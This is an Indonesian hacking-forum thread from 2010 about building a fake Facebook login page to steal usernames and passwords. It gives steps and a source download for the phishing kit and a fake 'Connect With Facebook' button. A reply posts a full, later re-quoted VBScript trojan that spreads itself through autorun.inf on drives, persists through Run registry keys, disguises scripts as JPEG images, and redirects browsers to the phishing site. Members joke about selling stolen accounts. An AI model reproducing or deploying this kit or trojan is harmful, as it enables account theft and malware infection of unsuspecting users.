Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

Facebook Fake Login

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Facebook Fake Login

Postby anharku » Fri Jun 25, 2010 2:38 pm

maaf saya hanya newbie yang ingin berbagi..
langsung saja kaitanya dengan fake login...
fake login yaitu halaman login palsu dimana
user yang tidak mengerti akan menganggap halaman web tersebut adalah asli padahal halaman tersebut palsu jika dicermati bagian alamat/address url nya. Banyak contoh kasus FAKE URL atau biasa disebut teknik phising ini misalnya kasus plesetan nama klikbca.com diplesetkan menjadi klickbca.com. User yang salah mengetikkan alamat url tersebut mengunjungi website yang sama padahal web tersebut hanyalah jebakan dari Black Hacker untuk mendapatkan username password. Contoh kasus yang lain adalah Fake login dari FRIENDSTER, Fake Login dari FACEBOOK.

kasus yang fb aja yagh.....
contok fb fake login ya kaya gini nih:

http://www.0-facebook.co.tv/

untuk membuat halaman fake login seperti itu caranya sebagai berikut:
siapkan:
• index.html (halaman facebook palsunya)
• logs.php (script untuk mengirimkan data user pass ke file logs.txt)
• logs.txt (file txt kosong saja, sebagai tempat penyimpanan user dan password)
Upload ketiga script tersebut ke hostinganmu lalu kamu sebarkan saja alamat /url fake login tersebut..
terserah kamu mau pake cara apa :circle:
download sourcenya disini:
http://www.4shared.com/file/jTeUmjvo/fb_f4kel0g1n.html

BUT YANG UDAH NGERTI CARA2 INI PASTI GA AKAN KENA JEBAKAN BATMAN :devil

semoga bermanfaat ilmunya :kaca:

salam
anharku
http://codenesia.com
User avatar
anharku
 
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Facebook Fake Login

Postby Nol Sembilan Tiga » Fri Jun 25, 2010 4:25 pm

wah bukannya ini ya om.. tp nih dah basi... :ngakak: :ngakak:
-==Hanya Ingin belajar dan belajar==-
User avatar
Nol Sembilan Tiga
 
Posts: 141
Joined: Wed Apr 07, 2010 1:19 pm
Location: MaNad0

Re: Facebook Fake Login

Postby Darkzzzz » Fri Jun 25, 2010 5:02 pm

Tambahan :
POC = http://forum.xcode.or.id/viewtopic.php?f=99&t=36475
By : XShadow

POC sejenis (By : Darkzzzz)
<a href="http://www.fakelogingua.com"><img src="http://vir2day.phpnet.us/nyit2/connect.gif"></a>
Taroh di blog atau site kamu, seolah-olah ini adalah tombol "Connect With Facebook", padahal mah bukan :ngakak:
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: Facebook Fake Login

Postby Nol Sembilan Tiga » Fri Jun 25, 2010 7:36 pm

:ngakak: :ngakak:

awas menipu itu gak baik.. tar masuk neraka...
-==Hanya Ingin belajar dan belajar==-
User avatar
Nol Sembilan Tiga
 
Posts: 141
Joined: Wed Apr 07, 2010 1:19 pm
Location: MaNad0

Re: Facebook Fake Login

Postby xlinkprince » Fri Jun 25, 2010 8:14 pm

Nol Sembilan Tiga wrote::ngakak: :ngakak:

awas menipu itu gak baik.. tar masuk neraka...


bener nih..... :gebrak:
xlinkprince
 
Posts: 1
Joined: Fri Jun 04, 2010 11:14 pm

Re: Facebook Fake Login

Postby Darkzzzz » Sat Jun 26, 2010 1:28 am

Soal masuk neraka belakangan, yang penting Chip Poker :devil
wekekekke....
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: Facebook Fake Login

Postby warxdoyo » Sat Jun 26, 2010 7:05 am

Darkzzzz wrote:Soal masuk neraka belakangan, yang penting Chip Poker :devil
wekekekke....


bener banget yang di blg bang drakzzz yang penting chips poker.. mana tau ada kan lumayan :D hahahahahha


di jual lagi deh chips poker`n kalo udh berhasil mendapat kan beberapa acount... :devil :devil
warxdoyo
 
Posts: 85
Joined: Mon Jun 21, 2010 8:39 pm

Re: Facebook Fake Login

Postby anharku » Sat Jun 26, 2010 8:54 am

maaf kalo ini dagh basi :maaf:

yagh namanya juga newbie yang pengen berbagi...
sape tau ada yang belom ngerti :circle:

makasih kakak2 yang udagh nambahin...
terutama momod Darkzzzz yang warnannya ijo ntu :love:
User avatar
anharku
 
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Facebook Fake Login

Postby Darkzzzz » Sat Jun 26, 2010 10:54 am

Gini lho mas anharku, mungkin mas bisa menyempurnakan script ini?
Code: Select all
'Trojan.Gen.FBFL 1.0


'(C) 2010 XCode.or.id




On Error Resume Next

Dim abc,def,ghi,jkl,r

Set abc = CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS"))

Set def = CreateObject(StrReverse("llehS.tpircsW"))

Set ghi = abc.GetSpecialFolder(2)

Set jkl = abc.GetFile(Wscript.ScriptFullName)

jkl.Copy (ghi & "\DSC10876.Jpg.vbe")



For r = 1 To 3

If r = 1 Then

mno_pqr

End If

If r = 2 Then

stu_vwx

End If

If r = 3 Then

efg_hij

End If

Next



Sub stu_vwx()

On Error Resume Next

Dim yza,Drive,Drives,bcd

For Each yza In abc.Drives

If (yza.DriveType = 1 Or yza.DriveType = 2) And yza.Path <> "A:" Then

efg_hij(yza.Path&"\")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.jpg.vbe")

bcd.Attributes = 32

abc.CopyFile ghi & "\DSC10876.Jpg.vbe",(yza.Path & "\DSC10876.Jpg.vbe")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.Jpg.vbe")

bcd.Attributes = 31

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 32

Set bcd = abc.CreateTextFile(yza.Path & "\autorun.inf")

bcd.WriteLine ";-----------------------------------------------------------"

bcd.WriteLine "[AUTORUN]"

bcd.WriteLine "Open=DSC10876.jpg.vbe"

bcd.WriteLine "Shellexecute=wscript.exe DSC10876.Jpg.vbe"

bcd.Close

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 31

End If

Next

mno_pqr

End Sub



Sub mno_pqr

On Error Resume Next

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox","firefox http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WGA",syspath & "\DSC10876.Jpg.vbe"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL","http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","http://facebook.co.cc"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\System32\wshext.dll,-4802","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Script Extensions\.VBS\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","shimgvw.dll,3"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\DefaultIcon\","shimgvw.dll,3"

efg_hij

End Sub



Sub efg_hij()

On Error Resume Next

Dim klm, nop

klm = def.SpecialFolders("AppData") & "\Mozilla\Firefox\Profiles"

If abc.FolderExists(klm) Then

For Each nop In abc.GetFolder(klm).SubFolders

klm_nop (nop)

Next

End If

End Sub



Sub klm_nop(klm)

On Error Resume Next

Dim bcd

Set bcd = abc.GetFile(klm & "\prefs.js")

bcd.Delete

Set bcd = abc.CreateTextFile(klm & "\prefs.js", True)

bcd.WriteLine "# Mozilla User Preferences"

bcd.WriteBlankLines (2)

bcd.WriteLine "user_pref(" & chr(34) & "browser.startup.homepage" & chr(34) & ", " & chr(34) & "http://facebook.co.cc" & chr(34) & ");"

bcd.Close

End Sub


Script di atas berfungsi untuk memanipulasi Firefox & Internet Explorer supaya masuk ke FakeLogin ... :devil
Wah kan keren tuh mas misalnya ada Malware yang bisa automatisasi giring mangsa ke FakeLogin :licik:
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: Facebook Fake Login

Postby warxdoyo » Sat Jun 26, 2010 11:21 am

Darkzzzz wrote:Gini lho mas anharku, mungkin mas bisa menyempurnakan script ini?
Code: Select all
'Trojan.Gen.FBFL 1.0


'(C) 2010 XCode.or.id




On Error Resume Next

Dim abc,def,ghi,jkl,r

Set abc = CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS"))

Set def = CreateObject(StrReverse("llehS.tpircsW"))

Set ghi = abc.GetSpecialFolder(2)

Set jkl = abc.GetFile(Wscript.ScriptFullName)

jkl.Copy (ghi & "\DSC10876.Jpg.vbe")



For r = 1 To 3

If r = 1 Then

mno_pqr

End If

If r = 2 Then

stu_vwx

End If

If r = 3 Then

efg_hij

End If




beh ternya eh ternyata bang drakzzz sadit juga yah...

jar`n bang gmn lakuin`n??


Next



Sub stu_vwx()

On Error Resume Next

Dim yza,Drive,Drives,bcd

For Each yza In abc.Drives

If (yza.DriveType = 1 Or yza.DriveType = 2) And yza.Path <> "A:" Then

efg_hij(yza.Path&"\")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.jpg.vbe")

bcd.Attributes = 32

abc.CopyFile ghi & "\DSC10876.Jpg.vbe",(yza.Path & "\DSC10876.Jpg.vbe")

Set bcd = abc.GetFile(yza.Path & "\DSC10876.Jpg.vbe")

bcd.Attributes = 31

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 32

Set bcd = abc.CreateTextFile(yza.Path & "\autorun.inf")

bcd.WriteLine ";-----------------------------------------------------------"

bcd.WriteLine "[AUTORUN]"

bcd.WriteLine "Open=DSC10876.jpg.vbe"

bcd.WriteLine "Shellexecute=wscript.exe DSC10876.Jpg.vbe"

bcd.Close

Set bcd = abc.GetFile(yza.Path & "\autorun.inf")

bcd.Attributes = 31

End If

Next

mno_pqr

End Sub



Sub mno_pqr

On Error Resume Next

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox","firefox http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WGA",syspath & "\DSC10876.Jpg.vbe"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL","http://facebook.co.cc"

def.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","http://facebook.co.cc"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\System32\wshext.dll,-4802","JPEG Image"

def.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Script Extensions\.VBS\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","shimgvw.dll,3"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\","JPEG Image"

def.RegWrite "HKEY_CLASSES_ROOT\VBEFile\DefaultIcon\","shimgvw.dll,3"

efg_hij

End Sub



Sub efg_hij()

On Error Resume Next

Dim klm, nop

klm = def.SpecialFolders("AppData") & "\Mozilla\Firefox\Profiles"

If abc.FolderExists(klm) Then

For Each nop In abc.GetFolder(klm).SubFolders

klm_nop (nop)

Next

End If

End Sub



Sub klm_nop(klm)

On Error Resume Next

Dim bcd

Set bcd = abc.GetFile(klm & "\prefs.js")

bcd.Delete

Set bcd = abc.CreateTextFile(klm & "\prefs.js", True)

bcd.WriteLine "# Mozilla User Preferences"

bcd.WriteBlankLines (2)

bcd.WriteLine "user_pref(" & chr(34) & "browser.startup.homepage" & chr(34) & ", " & chr(34) & "http://facebook.co.cc" & chr(34) & ");"

bcd.Close

End Sub


Script di atas berfungsi untuk memanipulasi Firefox & Internet Explorer supaya masuk ke FakeLogin ... :devil
Wah kan keren tuh mas misalnya ada Malware yang bisa automatisasi giring mangsa ke FakeLogin :licik:
warxdoyo
 
Posts: 85
Joined: Mon Jun 21, 2010 8:39 pm

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 10 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id